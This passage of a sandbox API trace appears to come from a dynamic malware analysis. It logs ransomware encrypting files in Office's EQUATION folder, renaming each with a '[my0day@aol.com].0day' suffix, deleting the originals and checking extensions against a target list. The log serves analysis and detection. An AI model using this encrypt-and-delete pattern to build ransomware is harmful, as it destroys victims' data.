lpNewFilePointer=0x0) returned 1 [0050.248] SetEndOfFile (hFile=0x20c) returned 1 [0050.253] CloseHandle (hObject=0x20c) returned 1 [0050.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0050.253] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 1 [0050.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0050.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0050.253] lstrlenW (lpString=".doc") returned 4 [0050.253] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0050.253] lstrlenW (lpString=".docx") returned 5 [0050.253] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1 [0050.254] lstrlenW (lpString=".pdf") returned 4 [0050.254] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0050.254] lstrlenW (lpString=".xls") returned 4 [0050.254] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0050.254] lstrlenW (lpString=".xlsx") returned 5 [0050.254] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1 [0050.254] lstrlenW (lpString=".ppt") returned 4 [0050.254] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0050.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0050.254] lstrlenW (lpString=".zip") returned 4 [0050.254] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0050.254] lstrlenW (lpString=".rar") returned 4 [0050.254] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0050.254] lstrlenW (lpString=".bz2") returned 4 [0050.254] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0050.254] lstrlenW (lpString=".7z") returned 3 [0050.254] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0050.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0050.254] lstrlenW (lpString=".dbf") returned 4 [0050.254] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0050.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0050.254] lstrlenW (lpString=".1cd") returned 4 [0050.254] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0050.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0050.254] lstrlenW (lpString=".jpg") returned 4 [0050.254] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0050.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0050.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0050.254] lstrlenW (lpString=".doc") returned 4 [0050.254] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0050.254] lstrlenW (lpString=".docx") returned 5 [0050.254] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1 [0050.254] lstrlenW (lpString=".pdf") returned 4 [0050.254] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0050.254] lstrlenW (lpString=".xls") returned 4 [0050.255] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0050.255] lstrlenW (lpString=".xlsx") returned 5 [0050.255] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1 [0050.255] lstrlenW (lpString=".ppt") returned 4 [0050.255] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0050.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0050.255] lstrlenW (lpString=".zip") returned 4 [0050.255] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0050.255] lstrlenW (lpString=".rar") returned 4 [0050.255] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0050.255] lstrlenW (lpString=".bz2") returned 4 [0050.255] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0050.255] lstrlenW (lpString=".7z") returned 3 [0050.255] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0050.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0050.255] lstrlenW (lpString=".dbf") returned 4 [0050.255] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0050.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0050.255] lstrlenW (lpString=".1cd") returned 4 [0050.255] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0050.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0050.255] lstrlenW (lpString=".jpg") returned 4 [0050.255] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0050.255] lstrcmpiW (lpString1=".manifest", lpString2=".0day") returned 1 [0050.255] lstrlenW (lpString="eqnedt32.exe.manifest") returned 21 [0050.255] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.256] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=566) returned 1 [0050.256] CloseHandle (hObject=0x20c) returned 1 [0050.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 0x20 [0050.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0050.256] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.256] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.256] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.256] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0050.256] GetLastError () returned 0x0 [0050.256] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x236, lpOverlapped=0x0) returned 1 [0050.258] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x240, lpOverlapped=0x0) returned 1 [0050.259] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.259] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xfe, lpOverlapped=0x0) returned 1 [0050.259] SetEndOfFile (hFile=0x198) returned 1 [0050.259] CloseHandle (hObject=0x198) returned 1 [0050.259] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.259] SetEndOfFile (hFile=0x20c) returned 1 [0050.260] CloseHandle (hObject=0x20c) returned 1 [0050.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0050.260] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 1 [0050.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0050.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0050.261] lstrlenW (lpString=".doc") returned 4 [0050.261] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0050.261] lstrlenW (lpString=".docx") returned 5 [0050.261] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0050.261] lstrlenW (lpString=".pdf") returned 4 [0050.261] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0050.261] lstrlenW (lpString=".xls") returned 4 [0050.261] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0050.261] lstrlenW (lpString=".xlsx") returned 5 [0050.261] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0050.261] lstrlenW (lpString=".ppt") returned 4 [0050.261] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0050.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0050.261] lstrlenW (lpString=".zip") returned 4 [0050.261] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0050.261] lstrlenW (lpString=".rar") returned 4 [0050.261] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0050.261] lstrlenW (lpString=".bz2") returned 4 [0050.261] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0050.261] lstrlenW (lpString=".7z") returned 3 [0050.261] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0050.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0050.261] lstrlenW (lpString=".dbf") returned 4 [0050.261] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0050.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0050.261] lstrlenW (lpString=".1cd") returned 4 [0050.262] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0050.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0050.262] lstrlenW (lpString=".jpg") returned 4 [0050.262] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0050.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0050.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0050.262] lstrlenW (lpString=".doc") returned 4 [0050.262] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0050.262] lstrlenW (lpString=".docx") returned 5 [0050.262] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0050.262] lstrlenW (lpString=".pdf") returned 4 [0050.262] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0050.262] lstrlenW (lpString=".xls") returned 4 [0050.262] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0050.262] lstrlenW (lpString=".xlsx") returned 5 [0050.262] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0050.262] lstrlenW (lpString=".ppt") returned 4 [0050.262] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0050.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0050.262] lstrlenW (lpString=".zip") returned 4 [0050.262] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0050.262] lstrlenW (lpString=".rar") returned 4 [0050.262] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0050.262] lstrlenW (lpString=".bz2") returned 4 [0050.262] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0050.262] lstrlenW (lpString=".7z") returned 3 [0050.262] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0050.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0050.262] lstrlenW (lpString=".dbf") returned 4 [0050.262] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0050.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0050.262] lstrlenW (lpString=".1cd") returned 4 [0050.262] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0050.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0050.263] lstrlenW (lpString=".jpg") returned 4 [0050.263] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0050.263] lstrcmpiW (lpString1=".HLP", lpString2=".0day") returned 1 [0050.263] lstrlenW (lpString="EQNEDT32.HLP") returned 12 [0050.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.263] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=176311) returned 1 [0050.263] CloseHandle (hObject=0x20c) returned 1 [0050.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp")) returned 0x20 [0050.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0050.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.263] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.264] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.264] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0050.264] GetLastError () returned 0x0 [0050.264] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x2b0b7, lpOverlapped=0x0) returned 1 [0050.269] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x2b0c0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x2b0c0, lpOverlapped=0x0) returned 1 [0050.272] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.272] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.273] SetEndOfFile (hFile=0x198) returned 1 [0050.273] CloseHandle (hObject=0x198) returned 1 [0050.273] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.273] SetEndOfFile (hFile=0x20c) returned 1 [0050.274] CloseHandle (hObject=0x20c) returned 1 [0050.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0050.275] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp")) returned 1 [0050.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0050.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0050.275] lstrlenW (lpString=".doc") returned 4 [0050.275] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0050.275] lstrlenW (lpString=".docx") returned 5 [0050.275] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1 [0050.275] lstrlenW (lpString=".pdf") returned 4 [0050.275] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0050.275] lstrlenW (lpString=".xls") returned 4 [0050.275] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0050.275] lstrlenW (lpString=".xlsx") returned 5 [0050.275] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1 [0050.275] lstrlenW (lpString=".ppt") returned 4 [0050.275] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0050.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0050.275] lstrlenW (lpString=".zip") returned 4 [0050.275] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0050.275] lstrlenW (lpString=".rar") returned 4 [0050.275] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0050.275] lstrlenW (lpString=".bz2") returned 4 [0050.275] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0050.275] lstrlenW (lpString=".7z") returned 3 [0050.275] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0050.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0050.276] lstrlenW (lpString=".dbf") returned 4 [0050.276] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0050.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0050.276] lstrlenW (lpString=".1cd") returned 4 [0050.276] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0050.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0050.276] lstrlenW (lpString=".jpg") returned 4 [0050.276] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0050.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0050.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0050.276] lstrlenW (lpString=".doc") returned 4 [0050.276] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0050.276] lstrlenW (lpString=".docx") returned 5 [0050.276] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1 [0050.276] lstrlenW (lpString=".pdf") returned 4 [0050.276] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0050.276] lstrlenW (lpString=".xls") returned 4 [0050.276] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0050.276] lstrlenW (lpString=".xlsx") returned 5 [0050.276] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1 [0050.276] lstrlenW (lpString=".ppt") returned 4 [0050.276] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0050.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0050.276] lstrlenW (lpString=".zip") returned 4 [0050.276] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0050.276] lstrlenW (lpString=".rar") returned 4 [0050.276] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0050.276] lstrlenW (lpString=".bz2") returned 4 [0050.276] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0050.276] lstrlenW (lpString=".7z") returned 3 [0050.276] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0050.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0050.276] lstrlenW (lpString=".dbf") returned 4 [0050.276] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0050.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0050.277] lstrlenW (lpString=".1cd") returned 4 [0050.277] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0050.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0050.277] lstrlenW (lpString=".jpg") returned 4 [0050.277] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0050.277] lstrcmpiW (lpString1=".TTF", lpString2=".0day") returned 1 [0050.277] lstrlenW (lpString="MTEXTRA.TTF") returned 11 [0050.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.277] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=7656) returned 1 [0050.277] CloseHandle (hObject=0x20c) returned 1 [0050.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf")) returned 0x20 [0050.278] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0050.278] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.278] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.278] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.278] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0050.278] GetLastError () returned 0x0 [0050.278] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x1de8, lpOverlapped=0x0) returned 1 [0050.282] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x1df0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x1df0, lpOverlapped=0x0) returned 1 [0050.283] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.283] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0050.283] SetEndOfFile (hFile=0x198) returned 1 [0050.283] CloseHandle (hObject=0x198) returned 1 [0050.283] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.283] SetEndOfFile (hFile=0x20c) returned 1 [0050.286] CloseHandle (hObject=0x20c) returned 1 [0050.286] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0050.286] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf")) returned 1 [0050.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0050.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0050.286] lstrlenW (lpString=".doc") returned 4 [0050.287] 